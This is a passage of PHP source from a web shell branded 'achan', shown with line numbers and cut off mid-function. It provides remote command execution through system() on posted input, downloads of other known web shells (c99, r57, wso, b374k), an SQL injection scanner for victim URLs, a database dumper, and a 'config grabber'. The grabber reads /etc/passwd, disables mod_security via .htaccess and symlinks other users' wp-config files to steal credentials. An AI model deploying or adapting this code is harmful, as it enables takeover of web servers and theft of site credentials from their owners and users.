  515. $zip->close();
  516.         echo"<meta http-equiv='refresh' content=0;url=?i=".getcwd()."/extract>";
  517.      } else {
  518.  
  519. echo "[<font color=grey>FAIL</font>] feiled!";
  520.      }
  521.     }
  522. }elseif($_POST['select']=='gz'){
  523.     if($_POST['cekf']){
  524.         if(!file_exists("compress")){
  525.             @mkdir("compress");
  526.         }
  527. foreach($file as $gz){
  528. $gzfile = "compress/".basename($gz).".gz";
  529. $fp = gzopen($gzfile, 'w9');
  530. if(gzwrite($fp, file_get_contents($gz))){
  531.     echo"<meta http-equiv='refresh' content=0;url=?i=".getcwd()."/compress>";
  532. }
  533. gzclose($fp);
  534.  
  535. }
  536. }
  537. }elseif ($_POST['select']=='tar') {
  538.     try
  539. {
  540.     $a = new PharData('achan48.tar');
  541. foreach($file as $tar){
  542.     $a->addFile($tar);
  543. }
  544.     $a->compress(Phar::GZ);
  545.     @unlink('achan48.tar');
  546. }
  547. catch (Exception $e)
  548. {
  549.     echo "Exception : " . $e;
  550. }
  551. }
  552. }
  553.  
  554.  
  555.  
  556. }else{
  557.     function refpage($url){
  558.     echo'<meta http-equiv="refresh" content="0;URL='.$url.'">';
  559. }
  560.  
  561. if($_GET['a']=='rename'){
  562.  
  563.     echo "<div class='w3-container w3-center'>
  564. <h3 class='w3-indigo w3-text-white w3-text-shadow'>New name</h3>
  565. <table><tr><td>
  566. <form method='post'>newname :</td><td><input type='text' name='newname' value='".$_GET[s]."' class='w3-input w3-animate-input' style='width:200px'></td><td><input type='submit' value='>>' class='w3-btn w3-indigo'></td></tr></table></form>
  567.     </div>";
  568.     if(isset($_POST['newname'])){
  569.         if(rename($_GET['i']."/".$_GET['s'],$_GET['i']."/".$_POST['newname'])){
  570.             refpage('?i='.$_GET['i']);
  571.         }else{
  572.             refpage('?i='.$_GET['i']);
  573.         }
  574.     }
  575. }elseif ($_GET['a']=='rmdir') {
  576.     function rmdir_unlink_rmdir($d){
  577.         if(!rmdir($d)){
  578.         $s=scandir($d);
  579.         foreach ($s as $ss) {
  580.             if(is_file($d."/".$ss)){
  581.                 if(unlink($d."/".$ss)){
  582.                     rmdir($d);
  583.                    
  584.                 }
  585.             }
  586.             if(is_dir($d."/".$ss)){
  587.                 rmdir($d."/".$ss);
  588.                 rmdir($d);
  589.                
  590.             }
  591.         }
  592.     }
  593.     }
  594.     if(rmdir_unlink_rmdir($_GET['i']."/".$_GET['s'])){
  595.         refpaage('?i='.$_GET['i']);
  596.     }else{
  597.         refpage('?i='.$_GET['i']);
  598.     }
  599. }elseif ($_GET['a']=='unlink') {
  600. if(unlink($_GET['i']."/".$_GET['s'])){
  601.     refpage('?i='.$_GET['i']);
  602. }else{
  603.     refpage('?i='.$_GET['i']);
  604. }
  605. }elseif ($_GET['a']=='view') {
  606.     echo'
  607.     <div class="w3-center w3-container">
  608.     <h3 class="w3-indigo w3-text-white w3-text-shadow">View file</h3>
  609. <p>Current file: <i>'.$_GET['i'].'/'.$_GET['s'].'</i></p></div>
  610. ';
  611.  
  612.         $f=$_GET['i'].'/'.$_GET['s'];
  613.         $file = wordwrap(file_get_contents($f),160,"\n",true);
  614.                 $a= highlight_string($file,true);
  615.                 $old = array("0000BB","000000","FF8000","DD0000", "007700");
  616.                 $new = array("f00","000", "333333", "f000e1" , "FF8000");
  617.                 $a= str_ireplace($old,$new, $a);
  618.                 $result = $a;
  619.  
  620.     echo'
  621.     <pre class="w3-codespan">'.$result.'</pre>';
  622. }elseif ($_GET['a']=='edit') {
  623.     echo "<div class='w3-center w3-container'>
  624.     <h3 class='w3-indigo w3-text-white w3-text-shadow'>Edit file</h3>
  625.     <form method='post'>
  626.     <center><table><tr><td>
  627.     save as :</td><td><input type='text' name='namabaru' value='".$_GET['s']."' class='w3-input w3-animate-input' style='width:200px'></td><td><input type='submit' value='>>' class='w3-btn w3-indigo' name='sbmt'></td></tr></table>
  628.     <textarea class='w3-codespan' style='width:100%;height:600px;' name='txta'>".htmlspecialchars(file_get_contents($_GET['i']."/".$_GET['s']))."</textarea>
  629.     </form></div>";
  630. }
  631. if(isset($_POST['sbmt'])){
  632.     $fp=fopen($_GET['i']."/".$_POST['namabaru'],'w');
  633.     if(fwrite($fp,$_POST['txta'])){
  634.         refpage("?i=".$_GET['i']);
  635.     }else{
  636.         refpage("?i=".$_GET['i']);
  637.     }
  638.     fclose($fp);
  639. }elseif ($_GET['a']=='download') {
  640.     ob_clean();
  641.     $dunlut = $_GET['i']."/".$_GET['s'];
  642.     header('Content-Description: File Transfer');
  643.     header('Content-Type: application/octet-stream');
  644.     header('Content-Disposition: attachment; filename="'.basename($dunlut).'"');
  645.     header('Expires: 0');
  646.     header('Cache-Control: must-revalidate');
  647.     header('Pragma: public');
  648.     header('Content-Length: ' . filesize($dunlut));
  649.     readfile($dunlut);
  650.     exit;
  651. }elseif ($_GET['a']=='chmod') {
  652.     echo "<div class='w3-container w3-center'>
  653.     <h3 class='w3-indigo w3-text-white w3-text-shadow'>Change Permission</h3>
  654.     <table><tr><td>
  655.     new Permission :</td><td><input type='number' name='perms' value='".octdec(fileperms($_GET['i']."/".$_GET['s']))."' class='w3-input w3-animate-input' style='width:200px;'></td><td><input type='submit' value='>>' class='w3-btn w3-indigo'></td></tr></table></form></div>";
  656. }
  657. if(isset($_POST['perms'])){
  658.     if(chmod($_GET['i']."/".$_GET['s'],$_POST['perms'])){
  659. refpage("?i=".$_GET['i']);
  660.     }else{
  661.         refpage("?i=".$_GET['i']);
  662.     }
  663. }elseif ($_GET['a']=='tentang') {
  664.     echo tentang();
  665. }elseif ($_GET['a']=='shell') {
  666.  
  667.     echo "
  668. <h3 class='w3-indigo w3-text-shadow w3-text-white w3-center'> Terminal Command Shell </h3>
  669.     <form method='post'>
  670.     <pre class='w3-code w3-indigo w3-text-shadow' style='height:700px;'>achan@".$_SERVER['HTTP_HOST'].":".getcwd()." $<input type='text' name='shell' class='w3-indigo w3-text-shadow' style='width:100%;height:24px;border:0;' value='".$_POST['shell']."'></form><br>";
  671.     if(isset($_POST['shell'])){
  672.         system($_POST['shell']);
  673.     }
  674. echo "</pre>";
  675.  
  676. }elseif ($_GET['a']=='cmd') {
  677.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  678.     echo "
  679. <h3 class='w3-indigo w3-text-shadow w3-text-white w3-center'> Command Prompt </h3>
  680.     <form method='post'>
  681.     <pre class='w3-code w3-indigo w3-text-shadow' style='height:700px;'>achan > ".getcwd()."  ><input type='text' name='cmd' class='w3-indigo w3-text-shadow' style='width:100%;height:24px;border:0;' value='".$_POST['cmd']."'></form><br>";
  682.     if(isset($_POST['cmd'])){
  683.         exe($_POST['shell']);
  684.     }
  685.     echo "</pre>";
  686. }else{
  687.     echo "<div class='w3-panel w3-indigo'><h3>This Just Work in Windows Server.</h3></div>";
  688. }
  689. }elseif ($_GET['a']=='phpinfo') {
  690.     @ob_start();
  691.     @eval("phpinfo();");
  692.     $buff = @ob_get_contents();
  693.     @ob_end_clean();   
  694.     $awal = strpos($buff,"<body>")+6;
  695.     $akhir = strpos($buff,"</body>");
  696.     echo "<div class=\"w3-table w3-striped w3-border w3-indigo w3-text-black w3-text-shadow\">".substr($buff,$awal,$akhir-$awal)."</div>";
  697. }elseif ($_GET['a']=='wso') {
  698. if(ambilcode($l['wso'],'achan-wso.php')){
  699.             echo"Request done!  <a href='achan-wso.php' target='_blank'>Click Here!</a>";
  700.         }else{
  701.             echo"Failed check  your connection!";
  702.         }
  703. }elseif ($_GET['a']=='injection') {
  704. if(ambilcode($l['injection'],'achan-1n73ction.php')){
  705.             echo"Request done!  <a href='achan-1n73ction.php' target='_blank'>Click Here!</a>";
  706.         }else{
  707.             echo"Failed check  your connection!";
  708.         }
  709. }elseif ($_GET['a']=='bejak') {
  710. if(ambilcode($l['bejak'],'achan-b374k.php')){
  711.             echo"Request done!  <a href='achan-b374k.php' target='_blank'>Click Here!</a>";
  712.         }else{
  713.             echo"Failed check  your connection!";
  714.         }
  715. }elseif ($_GET['a']=='idx') {
  716.     if(ambilcode($l['indoxploit_shell'],'achan-indoxploit.php')){
  717.             echo"Request done!  <a href='achan-indoxploit.php' target='_blank'>Click Here!</a>";
  718.         }else{
  719.             echo"Failed check  your connection!";
  720.         }
  721. }elseif ($_GET['a']=='c') {
  722.     if(ambilcode($l['c99'],'achan-c99.php')){
  723.             echo"Request done!  <a href='achan-c99.php' target='_blank'>Click Here!</a>";
  724.         }else{
  725.             echo"Failed check  your connection!";
  726.         }
  727. }elseif ($_GET['a']=='r') {
  728.     if(ambilcode($l['r57'],'achan-r57.php')){
  729.             echo"Request done!  <a href='achan-r57.php' target='_blank'>Click Here!</a>";
  730.         }else{
  731.             echo"Failed check  your connection!";
  732.         }
  733. }elseif ($_GET['a']=='andela') {
  734.     if(ambilcode($l['andela'],'achan-andela.php')){
  735.             echo"Request done!  <a href='achan-andela.php' target='_blank'>Click Here!</a>";
  736.         }else{
  737.             echo"Failed check  your connection!";
  738.         }
  739. }elseif ($_GET['a']=='sbh') {
  740.     if(ambilcode($l['sbh'],'achan-sbh.php')){
  741.             echo"Request done!  <a href='achan-sbh.php' target='_blank'>Click Here!</a>";
  742.         }else{
  743.             echo"Failed check  your connection!";
  744.         }
  745. }elseif ($_GET['a']=='bh') {
  746.     if(ambilcode($l['bh'],'achan-bh.php')){
  747.             echo"Request done!  <a href='achan-bh.php' target='_blank'>Click Here!</a>";
  748.         }else{
  749.             echo"Failed check  your connection!";
  750.         }
  751. }elseif ($_GET['a']=='adminer') {
  752. if(ambilcode($l['adminer'],'achan-adminer.php')){
  753.             echo"Request done!  <a href='achan-adminer.php' target='_blank'>Click Here!</a>";
  754.         }else{
  755.             echo"Failed check  your connection!";
  756.         }
  757. }elseif ($_GET['a']=='svc') {
  758.     echo'
  759.     <div class="w3-center w3-container">
  760.     <h3 class="w3-indigo w3-text-white w3-text-shadow w3-center">SQL injection vulnerable checker</h3>
  761.     <form method="post" >
  762.     <textarea style="width:60%;height:300px;" placeholder="http://korban.co.li/anu.php?id=1" name="korban" class="w3-indigo w3-codespan" style="width:500px;height:250px;border:0;"></textarea><br>
  763.     <input type="submit" name="submit" value="Check!" class="w3-btn w3-indigo w3-hover-white">
  764. </form>
  765. <br>';
  766. if(isset($_POST['submit'])){
  767. $ko=$_POST['korban'];
  768.  
  769. $pisah=explode("\n",$ko);
  770. echo "<hr>
  771. <table class='w3-table w3-striped w3-border'><thead class='w3-black'><th>No.</th><th>Website</th><th>Status</th></thead>";
  772. $no=1;
  773. foreach ($pisah as $ah) {
  774.     $dapatkan=file_get_contents($ah."'");
  775.     if(preg_match('/SQL syntax;|You Have Error|Warning|mysql_fetch_array|mysql_fetch_assoc|mysql_num_rows/',$dapatkan)){
  776.         echo "<tr class='w3-green w3-hover-white'><td>".$no++."</td><td><b>".$ah."</b></td><td>[<i>vulnerable</i>]</td></tr>";
  777.     }else{
  778.         echo "<tr class='w3-indigo w3-hover-white'><td>".$no++."</td><td><b>".$ah."</b></td><td>[<i>not vulnerable</i>]</td></tr>";
  779.     }
  780. }
  781. }
  782. echo "</table></div>";
  783. }elseif ($_GET['a']=='dbdump') {
  784.     echo '
  785.     <div class="w3-center w3-container">
  786.     <h3 class="w3-indigo w3-text-white w3-text-shadow w3-center">Database dumper</h3>
  787.     <form method="post" >
  788. <table class="w3-table w3-striped w3-border">
  789. <tr>
  790.     <td>Hostname </td>
  791.     <td><input type="text" name="server" class="w3-input w3-animate-input" style="width:200px"></td></tr><tr>
  792.     <td>Username</td>
  793.     <td><input  type="text" name="username" class="w3-input w3-animate-input" style="width:200px"></td></tr><tr>
  794.     <td>Password</td>
  795.     <td><input  type="text" name="password" class="w3-input w3-animate-input" style="width:200px"></td></tr><tr>
  796.     <td>DataBase</td>
  797.     <td><input  type="text" name="dbname" class="w3-input w3-animate-input" style="width:200px"></td></tr>
  798.     <tr>
  799.     <td>DB Type </td>
  800.     <td>
  801.     <select  name="method" class="w3-input w3-animate-input" style="width:200px">
  802.         <option  value="gzip">Gzip</option>
  803.         <option value="sql">Sql</option>
  804.         </select>
  805.     <input name="btnx" type="submit" value="Dump" class="w3-btn w3-indigo w3-hover-white"></td></tr>
  806.     </form></center></table>
  807.  
  808.     </div>';
  809. if (isset($_POST['btnx'])){
  810. $date = date("Y-m-d");
  811. $dbserver = $_POST['server'];
  812. $dbuser = $_POST['username'];
  813. $dbpass = $_POST['password'];
  814. $dbname = $_POST['dbname'];
  815. $file = "achan-$dbname-$date";
  816. $method = $_POST['method'];
  817. if ($method=='sql'){
  818. $file="achan-$dbname-$date.sql";
  819. $fp=fopen($file,"w");
  820. }else{
  821. $file="achan-$dbname-$date.sql.gz";
  822. $fp = gzopen($file,"w");
  823. }
  824. function write($data) {
  825. global $fp;
  826. if ($_POST['method']=='ssql'){
  827. fwrite($fp,$data);
  828. }else{
  829. gzwrite($fp, $data);
  830. }}
  831. mysql_connect ($dbserver, $dbuser, $dbpass);
  832. mysql_select_db($dbname);
  833. $tables = mysql_query ("SHOW TABLES");
  834. while ($i = mysql_fetch_array($tables)) {
  835.     $i = $i['Tables_in_'.$dbname];
  836.     $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
  837.     write($create['Create Table'].";\n\n");
  838.     $sql = mysql_query ("SELECT * FROM ".$i);
  839.     if (mysql_num_rows($sql)) {
  840.         while ($row = mysql_fetch_row($sql)) {
  841.             foreach ($row as $j => $k) {
  842.                 $row[$j] = "'".mysql_escape_string($k)."'";
  843.             }
  844.             write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
  845.         }
  846.     }
  847. }
  848. if ($method=='ssql'){
  849. fclose ($fp);
  850. }else{
  851. gzclose($fp);}
  852. header("Content-Disposition: attachment; filename=" . $file);  
  853. header("Content-Type: application/download");
  854. header("Content-Length: " . filesize($file));
  855. flush();
  856.  
  857. $fp = fopen($file, "r");
  858. while (!feof($fp))
  859. {
  860.     echo fread($fp, 65536);
  861.     flush();
  862. }
  863. fclose($fp);
  864.  
  865. }
  866. }elseif ($_GET['a']=='mkdir') {
  867.     echo "
  868.     <div class='w3-container w3-center'>
  869.     <h3 class='w3-indigo w3-text-white w3-text-shadow'>Mass Make Directory</h3>
  870. <form method='post'>
  871. <textarea class='w3-indigo w3-code' style='border:0;width:700px;height:280px;' name='mkdir'>newdir\nnewdir2</textarea><br>
  872. <input type='submit' class='w3-btn  w3-indigo w3-hover-white' value='make dir'>
  873. </form>
  874. </div>
  875.     ";
  876. if(isset($_POST['mkdir'])){
  877.     $dir=$_POST['mkdir'];
  878.     $mdir=explode("\n",$dir);
  879.     foreach ($mdir as $ndir) {
  880.         mkdir($_GET['i']."/".$ndir,0777);
  881.     }
  882.     echo "<script>
  883.     window.location.href='?i=".$_GET['i']."';
  884.     </script>";
  885. }
  886. }elseif ($_GET['a']=='mkfile') {
  887.  
  888.         echo "
  889.     <div class='w3-container w3-center'>
  890.     <h3 class='w3-indigo w3-text-white w3-text-shadow'>Make File</h3>
  891. <form method='post'>
  892. <table><tr><td>Save as:</td><td><input type='text' name='letakf' class='w3-input w3-animate-input' style='width:280px;' value='".$d."/achan-newfile.php'></td><td><input type='submit' class='w3-btn  w3-indigo w3-hover-white' value='make file' name='subfile'></td></tr></table>
  893. <textarea class='w3-indigo w3-code' style='border:0;width:100%;height:500px;' name='mkfile'><?php\necho'sometext';\n?></textarea><br>
  894. </form>
  895. </div>";
  896. if(isset($_POST['subfile'])){
  897.     $xp=fopen($_POST['letakf'],"w");
  898.     if(fwrite($xp,$_POST['mkfile'])){
  899.         echo "<script>
  900.         alert('file created!');
  901.         </script>";
  902.     }else{
  903.         echo "<script>
  904.         alert('failed to create file');
  905.         </script>";
  906.     }
  907.     fclose($xp);
  908. }
  909. }elseif ($_GET['a']=='hi') {
  910.     if(isset($_POST['gethash'])){
  911.         $hash = $_POST['hash'];
  912.         if(strlen($hash)==32){
  913.             $hashresult = "MD5 Hash";
  914.         }elseif(strlen($hash)==40){
  915.             $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  916.         }elseif(strlen($hash)==13){
  917.             $hashresult = "DES(Unix) Hash";
  918.         }elseif(strlen($hash)==16){
  919.             $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  920.         }elseif(strlen($hash)==41){
  921.             $GetHashChar = substr($hash, 40);
  922.             if($GetHashChar == "*"){
  923.                 $hashresult = "MySQL5 Hash";
  924.             }  
  925.         }elseif(strlen($hash)==64){
  926.             $hashresult = "SHA-256 Hash";
  927.         }elseif(strlen($hash)==96){
  928.             $hashresult = "SHA-384 Hash";
  929.         }elseif(strlen($hash)==128){
  930.             $hashresult = "SHA-512 Hash";
  931.         }elseif(strlen($hash)==34){
  932.             if(strstr($hash, '$1$')){
  933.                 $hashresult = "MD5(Unix) Hash";
  934.             }  
  935.         }elseif(strlen($hash)==37){
  936.             if(strstr($hash, '$apr1$')){
  937.                 $hashresult = "MD5(APR) Hash";
  938.             }  
  939.         }elseif(strlen($hash)==34){
  940.             if(strstr($hash, '$H$')){
  941.                 $hashresult = "MD5(phpBB3) Hash";
  942.             }  
  943.         }elseif(strlen($hash)==34){
  944.             if(strstr($hash, '$P$')){
  945.                 $hashresult = "MD5(Wordpress) Hash";
  946.             }  
  947.         }elseif(strlen($hash)==39){
  948.             if(strstr($hash, '$5$')){
  949.                 $hashresult = "SHA-256(Unix) Hash";
  950.             }  
  951.         }elseif(strlen($hash)==39){
  952.             if(strstr($hash, '$6$')){
  953.                 $hashresult = "SHA-512(Unix) Hash";
  954.             }  
  955.         }elseif(strlen($hash)==24){
  956.             if(strstr($hash, '==')){
  957.                 $hashresult = "MD5(Base-64) Hash";
  958.             }  
  959.         }else{
  960.             $hashresult = "Hash type not found";
  961.         }
  962.     }else{
  963.         $hashresult = "Not Hash Enteindigo";
  964.     }
  965.    
  966.     echo'
  967.     <div class="w3-container w3-center">
  968.     <h3 class="w3-indigo w3-text-white w3-text-shadow"> Hash Identification </h3>
  969.    
  970.         <form method="POST">
  971.         <table  class="w3-table w3-striped">
  972.         <tr><td>Enter Hash</td></b><td>:</td>   <td><input type="text" name="hash"  class="w3-input w3-animate-input" style="width:200px"/></td><td><input type="submit" name="gethash" value="Identify Hash" class="w3-btn w3-indigo"/></td></tr>
  973.         <tr><b><td>Result</td><td>:</td><td colspan=2>'.$hashresult.'</td></tr></b>
  974.     </table></tr></form>
  975.     </div>';
  976. }elseif ($_GET['a']=='ph') {
  977.         $submit= $_POST['enter'];
  978. if (isset($submit)) {
  979. $pass = $_POST['password'];
  980. $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN';
  981. $hash = md5($pass);
  982. $md4 = hash("md4",$pass);
  983. $hash_md5 = md5($salt.$pass);
  984. $hash_md5_double = md5(sha1($salt.$pass));
  985. $hash1 = sha1($pass);
  986. $sha256 = hash("sha256",$text);
  987. $hash1_sha1 = sha1($salt.$pass);
  988. $hash1_sha1_double = sha1(md5($salt.$pass));
  989. }
  990. echo '
  991. <div class="w3-container w3-center">
  992. <h3 class="w3-indigo w3-text-shadow w3-text-white">  Password Hash </h3>
  993. <form  method="post">
  994. <table class="w3-table w3-striped">
  995. <tr><td>Input string :</td>
  996. <td><input  type="text" name="password" class="w3-input w3-animate-input" style="width:280px" /></td><td>
  997. <input  type="submit" name="enter" value="hash" class="w3-btn w3-indigo"/>
  998. </td></tr>
  999. <tr class="w3-indigo"><th colspan="3">Hasil Hash</th></center></tr>
  1000. <tr><td>Original Password</td><td colspan="2"><input  type="text" value="'.$pass.'" class="w3-input w3-animate-input" style="width:280px"></td></tr>
  1001. <tr><td>MD5</td><td colspan="2"><input  type="text"   class="w3-input w3-animate-input" style="width:280px" value="'.$hash.'"></td></tr>
  1002. <tr><td>MD4</td><td colspan="2"><input  type="text"  class="w3-input w3-animate-input" style="width:280px" value="'.$md4.'"></td></tr>
  1003. <tr><td>MD5 with Salt</td><td colspan="2"><input type="text"  class="w3-input w3-animate-input" style="width:280px" value="'.$hash_md5.'"></td></tr>
  1004. <tr><td>MD5 with Salt & Sha1</td><td colspan="2"><input  type="text"  class="w3-input w3-animate-input" style="width:280px" value="'.$hash_md5_double.'"></td></tr>
  1005. <tr><td>Sha1</td><td colspan="2"><input  type="text"  class="w3-input w3-animate-input" style="width:280px" value="'.$hash1.'"></td></tr>
  1006. <tr><td>Sha256</td><td colspan="2"><input  type="text"  class="w3-input w3-animate-input" style="width:280px" value="'.$sha256.'"></td></tr>
  1007. <tr><td>Sha1 with Salt</td><td colspan="2"><input  type="text"  class="w3-input w3-animate-input" style="width:280px" value="'.$hash1_sha1.'"></td></tr>
  1008. <tr><td>Sha1 with Salt & MD5</td><td colspan="2"><input  type="text"  class="w3-input w3-animate-input" style="width:280px" value="'.$hash1_sha1_double.'"></td></tr></table></div>';
  1009. }elseif ($_GET['a']=='ed') {
  1010.     echo'<div class="w3-center w3-container">
  1011.     <h3 class="w3-indigo w3-text-shadow w3-text-white"> Enc0de & Dec0de + Conventer  </h3>
  1012.     <br>
  1013. <form method="post">
  1014. <textarea name="e" style="width:77%;height:300px"  placeholder="input string here [!]" class="w3-indigo">
  1015. </textarea><br><br>
  1016. <center>
  1017.     <select name="opt" style="width:70%" class="w3-input w3-center">
  1018.         <optgroup label="Converter">
  1019.     <option value="dechex">Decimal to Hexa</option>     <option value="hexdec">Hexa to Decimal</option>
  1020. <option value="decoct">Decimal to Octa</option>
  1021. <option value="octdec">Octa to Decimal</option>  
  1022.         <option value="decbin">Decimal to Binary</option>  
  1023.         <option value="bindec">Binary to Decimal</option>  
  1024.          <option value="hexbin">Hexa to Binary</option>
  1025. <option value="binhex">Binary to Hexa</option>
  1026. </optgroup><optgroup label="encode&decode">
  1027.     <option value="url">URL</option>    <option value="base64">base64</option>
  1028. <option value="urlbase64">URL - base64</option>
  1029. <option value="cuu">Convert_uu</option>
  1030. <option value="sgzcuus64">str_rot13 - gzinflate - convert_uu - str_rot13 - base64 </option>
  1031. <option value="gz64">gzinflate - base64</option>     
  1032.         <option value="sgz64">str_rot13 - gzinflate - base64</option>  
  1033.         <option value="s64">str_rot13 - gzinflate - str_rot13 - base64</option>
  1034. <option value="sb64">str_rot13 - base64 </option>
  1035.          <option value="64url">URL - base64</option>   
  1036. <option value="64u64u">URL - base64 - url - base64</option>
  1037. <option value="ss64"> base64 - str_rot13 - str_rot13</option>
  1038. </optgroup>
  1039.     </select>  
  1040.     <br>
  1041. <input type="submit" value="Convert!" name="c" class="w3-btn w3-indigo w3-hover-white">
  1042. <input type="submit" value="enc0de" name="en" class="w3-btn w3-blue w3-hover-white">
  1043. <input type="submit" value="dec0de" name="de" class="w3-btn w3-yellow w3-hover-white">
  1044. </form>
  1045.    
  1046.     ';
  1047.         $a = $_POST['e'];  
  1048.         $o = $_POST['opt'];
  1049.     if(isset($_POST['c'])){
  1050.     switch($o){
  1051.         case'dechex';
  1052.         $s= dechex($a);
  1053.         break;
  1054.         case'dechex';  
  1055.         $s= hexdec($a);
  1056.         break;
  1057.         case'decoct';
  1058.         $s= decoct($a);
  1059.         break;
  1060.         case'octdec';
  1061.         $s= octdec($a);
  1062.         break;
  1063.         case'decbin';
  1064.         $s= decbin($a);
  1065.         break;
  1066.         case'bindec';
  1067.         $s= bindec($a);
  1068.         break;
  1069.         case'hexbin';
  1070.         $s= hex2bin($a);
  1071.         break;
  1072.         case'binhex';
  1073.         $s= bin2hex($a);
  1074.         break;
  1075.         }
  1076. echo'<br>:: OutPut ::<br><textarea style="width:77%;height:300px " class="w3-indigo">'.$s.'</textarea>';
  1077.         }elseif(isset($_POST['en'])){
  1078.             switch($o){
  1079.                 case'url';
  1080.                 $r=urlencode($a);
  1081.                 break;
  1082.                 case'base64';
  1083.                 $r=base64_encode($a);
  1084.                 break;
  1085.                 case'urlbase64';
  1086.                 $r=urlencode(base64_encode($a));
  1087.                 break;
  1088.                 case'gz64';
  1089.                 $r=base64_encode(gzdeflate($a));
  1090.            
  1091.             break;
  1092.             case'sgz64';
  1093.             $r=base64_encode(gzdeflate(str_rot13($a)));
  1094.             break;
  1095.             case's64';
  1096.             $r=(base64_encode(str_rot13(gzdeflate(str_rot13($a)))));
  1097.         break;
  1098.         case'sb64';
  1099.         $r=base64_encode(str_rot13($a));
  1100.         break; 
  1101.         case'64url';
  1102.         $r=base64_encode(urlencode($a));
  1103.         break;
  1104.         case'64u64u';
  1105.         $r=base64_encode(urlencode(base64_encode(urlencode($a))));
  1106.         break;
  1107.         case'cuu';
  1108.         $r=convert_uuencode($a);
  1109.         break;
  1110.      case'sgzcuus64';
  1111.      $r=base64_encode(str_rot13(convert_uuencode(gzdeflate(str_rot13($a)))));
  1112.      break;
  1113.      case'ss64';
  1114.      $r=str_rot13(str_rot13(base64_encode($a)));
  1115.      break;
  1116.         }
  1117.             echo'<br>:: OutPut::<br><textarea style="width:77%;height:300px" class="w3-indigo">'.$r.'</textarea>';
  1118.        
  1119.         }
  1120. //Dec0de
  1121.     if(isset($_POST['de'])){
  1122.         switch($o){
  1123.             case'url';
  1124.                 $r=urldecode($a);
  1125.                 break;
  1126.                 case'base64';
  1127.                 $r=base64_decode($a);
  1128.                 break;
  1129.                 case'urlbase64';
  1130.                 $r=base64_decode(urldecode($a));
  1131.                 break;
  1132.                 case'gz64';
  1133.                 $r=gzinflate(base64_decode($a));
  1134.            
  1135.             break;
  1136.             case'sgz64';
  1137.             $r=str_rot13(gzinflate(base64_decode($a)));
  1138.             break;
  1139.             case's64';
  1140.             $r=str_rot13(gzinflate(str_rot13(base64_decode($a))));
  1141.         break;
  1142.         case'sb64';
  1143.         $r=str_rot13(base64_decode($a));
  1144.         break; 
  1145.         case'64url';
  1146.         $r=urldecode(base64_decode($a));
  1147.         break;
  1148.         case'64u64u';
  1149.         $r=urldecode(base64_decode(urldecode(base64_decode($a))));
  1150.         break;
  1151.      case'cuu';
  1152.         $r=convert_uudecode($a);
  1153.         break;
  1154.      case'sgzcuus64';
  1155.      $r=str_rot13(gzinflate(convert_uudecode(str_rot13(base64_decode($a)))));
  1156.      break;    
  1157.      case'ss64';
  1158.      $r=base64_decode(str_rot13(str_rot13($a)));
  1159.         }
  1160.         $rx = htmlspecialchars($r);
  1161.             echo'<br>:: OutPut::<br><textarea style="width:77%;height:300px" class="w3-indigo">'.$rx.'</textarea>';
  1162.     }
  1163. }elseif ($_GET['a']=='rs') {
  1164.     echo"
  1165.     <div class='w3-container w3-center'>
  1166.     <h3 class='w3-indigo w3-text-shadow w3-text-white'> auto replace string </h3>
  1167.     <br>
  1168.     <form method='post'>
  1169.     <table class='w3-table w3-border'>
  1170.     <tr><td colspan=2><input type='submit' name='sstr' value='replace all' style='width:100%;' class='w3-btn w3-btn-block w3-indigo'></td></tr>
  1171.     <tr><td>
  1172.     <textarea name='str' style='width:600px;height:200px;' class='w3-indigo'>Your string here</textarea></td><td>
  1173.     <textarea name='str2' style='width:600px;height:200px;' class='w3-blue'>string will u replace</textarea></td></tr>
  1174.     <tr><td>
  1175.     <textarea name='str3' style='width:600px;height:200px;' class='w3-yellow'>string replace</textarea></td><td>
  1176.     <form>";
  1177.     if(isset($_POST['sstr'])){
  1178.         $rep=str_replace($_POST['str2'],$_POST['str3'],$_POST['str']);
  1179.         if($rep){
  1180.             echo'
  1181.             <textarea style="width:600px;height:200px;" class="w3-green">'.htmlspecialchars($rep).'</textarea>';
  1182.         }
  1183.     }
  1184.     echo "</td></tr></table>";
  1185. }elseif ($_GET['a']=='logout') {
  1186.     session_destroy();
  1187.     echo "<script>
  1188.     alert('Bye!');
  1189.     window.location.href='?login.php';
  1190.     </script>";
  1191. }elseif ($_GET['a']=='achan') {
  1192.     echo tentangAchan();
  1193. }elseif ($_GET['a']=='jkt48') {
  1194.     echo tentangJKT48();
  1195. }elseif ($_GET['a']=='cg') {
  1196.     if(!file("/etc/passwd")){ $etcpasswd="/etc/passwd  gak bisa di akses!";}else{ $etcpasswd= file_get_contents('/etc/passwd');}
  1197.     echo'<div class="w3-container w3-center"><h3 class="w3-indigo w3-text-white w3-text-shadow">Config Grabber</h3>';
  1198.     echo'<form method=post><center><textarea  name="user" class="w3-code w3-indigo" style="width:100%;height:500px">'.$etcpasswd.'</textarea><br><br><input type="submit" name="su" value="Gotcha e\'m all!" class="w3-btn w3-indigo"></form></center>';
  1199.  
  1200. if(isset($_POST['su']))
  1201.  {
  1202.  mkdir('config_grab',0777);
  1203.  $r = " \nOptions Indexes FollowSymLinks \nForceType text/plain \nAddType text/plain .php \nAddType text/plain .html \nAddType text/html .shtml \nAddType txt .php \nAddHandler server-parsed .php \nAddHandler server-parsed .shtml \nAddHandler txt .php \nAddHandler txt .html \nAddHandler txt .shtml \nOptions All \n<IfModule mod_security.c> \nSecFilterEngine Off \nSecFilterScanPOST Off \nSecFilterCheckURLEncoding Off \nSecFilterCheckCookieFormat Off \nSecFilterCheckUnicodeEncoding Off \nSecFilterNormalizeCookies Off \n</IfModule>";
  1204. $f = fopen('config_grab/.htaccess','w');
  1205. fwrite($f,$r);
  1206. echo "<br><center><b><i><a href='config_grab'>TOUCH ME SENPAI</a></i></b></center>";
  1207. $usr=explode("\n",$_POST['user']);
  1208. foreach($usr as $uss)
  1209. {
  1210.  $us=trim($uss);
  1211. $r="config_grab/";
  1212. symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
  1213. symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wp-config');
